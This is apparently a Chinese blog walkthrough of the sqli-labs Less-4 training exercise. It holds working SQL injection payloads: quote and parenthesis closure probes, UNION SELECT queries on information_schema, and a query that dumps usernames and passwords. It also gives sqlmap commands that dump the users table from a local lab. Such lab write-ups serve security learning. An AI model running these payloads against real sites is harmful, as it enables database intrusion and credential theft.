【SQL注入攻击】GET-Error based-Double quotes-String(基于错误的GET双引号字符型注入)

已于 2022-10-31 20:47:54 修改
阅读量268 收藏
点赞数
分类专栏: 漏洞学习 文章标签: 前端 javascript json
于 2022-10-23 21:17:29 首次发布
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/sm1918451478/article/details/127481025
版权

hacker

观察页面

id=1

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-tVfgFdIX-1666530809042)(assets/image-20221023204138-aa085rw.png)]​

有正常回显页面

判断注入点

注入id=1’,成功得到了回显,说明此次注入点不在单引号的闭合上

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-G3QJcyj3-1666530809045)(assets/image-20221023204553-ri5glk2.png)]​

尝试前面的括号

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-mh84OnT3-1666530809046)(assets/image-20221023204656-9drtwsl.png)]​

同样可以得到回显,尝试双引号

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-PVGdN0P0-1666530809047)(assets/image-20221023204733-waucfxf.png)]​

出现了报错,可以看到的这里报错的地方还有一个括号,说明这不是单纯的用双引号进行闭合,还有用到括号

测试

?id=1" )and 1=1 --+

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-vR9ak2XS-1666530809049)(assets/image-20221023205832-1xbcla0.png)]​

得到,该注入点为:)🦃

判断字段数

?id=1") order by 3--+

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-IGh2Ak9h-1666530809050)(assets/image-20221023210009-x6p51gu.png)]​

输入4时发生了报错,说明字段数为3

判断回显位

id=1") and 0 union select 1,2,3 --+

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-IQPAaUMN-1666530809051)(assets/image-20221023210132-642dtvi.png)]​

回显位为2、3位

爆数据库名

id=1") and 0 union select 1,2,3 --+

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-gNa0Mjty-1666530809052)(assets/image-20221023210247-isos9vt.png)]​

爆数据库中的数据表名

?id=1") and 0 union select 1,2,group_concat(table_name) from information_schema.tables where table_schema=database() --+

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-Kf2SnyWm-1666530809053)(assets/image-20221023210353-2jdyynj.png)]​

爆数据表中的字段名

![?id=1") and 0 union select 1,group_concat(column_name),3 from information_schema.columns where table_schema='security' and table_name='users' --+](https://img-blog.csdnimg.cn/f13ce7f41dec4587bedae62ce8de18be.png)

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-YXQiqY1h-1666530809054)(assets/image-20221023210507-ioq3h17.png)]​

爆数据库的所有内容

?id=1") and 0 union select 1,group_concat(concat_ws(':',id,username,password)),3 from users --+

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-nAdl2lZl-1666530809055)(assets/image-20221023210546-2tzprxs.png)]​

成功拿到数据库数据

sqlmap

sqlmap -u "http://0.0.0.0:8088/Less-2//?id=1" -batch

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-e94U6aUN-1666530809055)(assets/image-20221023210830-elit7i1.png)]​

返回漏洞的一些信息,不过没啥用

爆数据库名

sqlmap -u "http://0.0.0.0:8088/Less-2//?id=1" -batch -dbs

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-xHaKMDoD-1666530809056)(assets/image-20221023210922-g58ukeq.png)]​

爆数据库中的数据表

sqlmap -u "http://0.0.0.0:8088/Less-2//?id=1" -batch -D security --tables

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-LBpAldyO-1666530809057)(assets/image-20221023210954-fw8v1ol.png)]​

爆数据表的字段信息

sqlmap -u "http://0.0.0.0:8088/Less-2//?id=1" -batch -T users --columns

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-PCiSFsWP-1666530809058)(assets/image-20221023211102-3frl6zq.png)]​

爆数据表的信息

sqlmap -u "http://0.0.0.0:8088/Less-2//?id=1" -batch -D security -T users -C username,password -dump

[外链图片转存失败,源站可能有防盗链机制,建议将图片保存下来直接上传(img-DXKR0XwQ-1666530809059)(assets/image-20221023211150-vghwwto.png)]​


Cinnam0n
关注
  • 0
    点赞
  • 0
    收藏
    觉得还不错? 一键收藏
  • 0
    评论
专栏目录
sql注入手法详解
m0_71299382的博客
11-26 1万+
sql注入总结
SQL注入双引号报错注入
weixin_43765321的博客
03-02 1885
1. 基于联合查询双引号注入模式 1.1 联合查询注入的一般步骤: 1.2 判断注入、求闭合字符 SQL语句如下时: 此时,若 id = 1‘ 无异常 id = 1 and 1 = 1 – +正确显示 id = 1 and 1 = 2 – +错误 则,极有可能存在数字SQL注入 SQL语句如下时: 此时,若 id = 1‘ 无异常 id = 1’ and 1 = 1 – +正确显示 id = 1‘ and 1 = 2 – +错误 则,极有可能存在单引号字符SQL注入 SQL语句如下时:
SQL注入攻击】GET-Error based - Intiger based (基于错误的GET整注入)
sm1918451478的博客
10-21 921
SQL注入攻击Error based - Intiger based (基于错误的GET整注入)
less 4 GET - Error based - Double Quotes - String (基于错误的GET双引号字符注入
TYW168168的博客
05-10 228
1、单引号 变成双引号 $id = '"' . $id . '"';$sql="SELECT * FROM users WHERE id=($id) LIMIT 0,1"; 转载于:https://www.cnblogs.com/yilishazi/p/9020744.html
sqli-labs练习 (四)------GET-Error based-Double Quotes-String
wkend的博客
04-17 348
输入1,返回结果 输入1',返回结果 咦,这是咋回事?怎么都能返回结果?根据打印出来的sql语句可以看到 SELECT * FROM users WHERE id=("1'") LIMIT 0,1 原来是双引号的缘故,我们知道,在双引号里是可以包含单引号的 下面是sql查询语句源代码 $id = '"' . $id . '"'; $sql="SELECT * FROM use...
to-double-quotes-cli:将匹配的单引号转换为双引号
04-29
$ npm install --global to-double-quotes-cli 用法 $ to-double-quotes --help Usage $ to-double-quotes <string> $ echo <string> | to-double-quotes Example $ to-double-quotes "I love 'unicorns'" I ...
php中$_GET与$_POST过滤sql注入的方法
01-21
本文实例讲述了php中$_GET与$_POST过滤sql注入的方法,分享给大家供大家参考。具体分析如下: 此函数只能过滤一些敏感的sql命令了,像id=1这种大家还是需要自己简单过滤了。 主要实现代码如下: 复制代码 代码如下:...
to-double-quotes:将匹配的单引号转换为双引号
04-29
双引号 将匹配的单引号转换为双引号: I 'love' unicorns → I "love" unicorns 安装 $ npm install to-double-quotes 用法 import toDoubleQuotes from 'to-double-quotes' ; toDoubleQuotes ( 'I love \'unicorns\...
sublime-text-latex-smart-quotes:Sublime Text Package,以一种聪明的方式插入引号
05-10
此Sublime Text Package的目的是使LaTeX中的引号“聪明”,即插入您打算使用的引号。 它的灵感来自于Emacs的。 要建立此目标,它使用: 语言检测(支持的语言:英语,德语,法语) 根据插入位置进行上下文检测 ...
SQL注入攻击】GET-Error based-Single quotes with twist-String(基于错误的GET单引号变形字符注入
sm1918451478的博客
10-31 383
SQL注入攻击】GET-Error based-Single quotes with twist-String(基于错误的GET单引号变形字符注入
【sqli-labs】 less4 GET - Error based - Double Quotes - String (基于错误的GET双引号字符注入)...
ajxi63204的博客
01-18 162
提交id参数 加' http://localhost/sqli/Less-4/?id=1' 页面正常,添加" http://localhost/sqli/Less-4/?id=1" 对应的sql语句应为 select ... from ... where xx=("1") limit 0,1 构造 select ... from ....
SQL注入攻击】GET-Double Injection-Double Quotes-String(双注入GET双引号字符注入
sm1918451478的博客
11-02 240
SQL注入攻击】GET-Double Injection-Double Quotes-String(双注入GET双引号字符注入
sqli-labs(less4)GET - Error based - Double Quotes - String (基于错误的GET双引号字符注入
m0_68980215的博客
07-06 76
sqli-lab lesson4
SQL练习(less-4)双引号字符注入
AmyBaby00的博客
08-27 1082
http://127.0.0.1/sqli/Less-4/?id=1 id=1 and 1=2 (1=2 条件不成立) 正常回显 判断为字符注入 很多时候仅仅使用单一的符号进行判断是完全不够的,要多使用不同类的符号来进行测试的判断,使用包括’,",,(,=,&等等字符,甚至有时候还要使用其他的探查方法,只有不断的进行尝试。 注意:一定是英文的标点符号 判断为")注入 查询显示位 判断...
Sqli-labs2-5单引号变形,双引号,双注入
Recar的博客
12-12 4306
第二题第二个就是整形的了第一个是字符串的整形与字符注入的区别!!!整形是不用单引号闭合的,不要后面注释直接 union联合查询就可以了~~ 接下来就可以继续向第一题那样测试了整不需要闭合就可以执行后面的语句,字符的则要闭合http://localhost:9096/sqli-labs/Less-2/?id=-1 union select 1,2,table_name from informat
SQL注入字符,单引号闭合)
weixin_43695031的博客
11-06 7772
SQL注入字符,单引号闭合) 1、判断为字符还是整,?为连接符 ?id=1 and 1=2 当不报错说明为字符,反之则是整 2、构造闭合 ?id=1’and%20 ‘1’='1 说明是单引号闭合则可以用 --+ 来注释掉后面的 ’ 例如:?id=1’ --+ 也可以用 **?id=1’**来判断,出错了就说明判断对了,因为在源语句中后面多出了一个 ’ ,所以采用上面 –+ 来注释掉后面...
【sqli-labs】 less12 POST - Error Based - Double quotes- String-with twist (基于错误双引号POST字符变形的注入)...
ajxi63204的博客
01-20 279
加个双引号 通过报错信息猜测SQL语句 select ... from ... where xxx=("") and yyy=("") limit 0,1 将括号闭合掉,通过注释后面的条件登录 转载于:https://www.cnblogs.com/omnis/p/8319595.html...
Sqli-labs Less-4 Error Based- DoubleQuotes String
04-15 124
首先看网站还是要求输入id获取内容,输入单引号测试网站,发现输出结果一致。 /sql/Less-4/?id=1' 接下来使用双引号 测试一下 发现了报错信息。 通过他的报错发现他的闭合规则应该是双引号加括号,在后面加一个右括号应该可以成功。、 /sql/Less-4/?id=1")--+ # 有正常的结果显示,接下来在后面加注入语句。 /sql/Less-4/?id=1") and updatexml(1,concat(0x7e,(select user()),0x7e),1)--
stylelint string-quotes
最新发布
08-15
回答: 在Stylelint中,string-quotes是一个用于定义字符串引号规范的配置项。它可以控制字符串的引号类,有三种可选的配置值:"single"、"double"和"consistent"。其中,"single"表示只允许使用单引号,"double...

“相关推荐”对你有帮助么?

  • 非常没帮助
  • 没帮助
  • 一般
  • 有帮助
  • 非常有帮助
提交
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值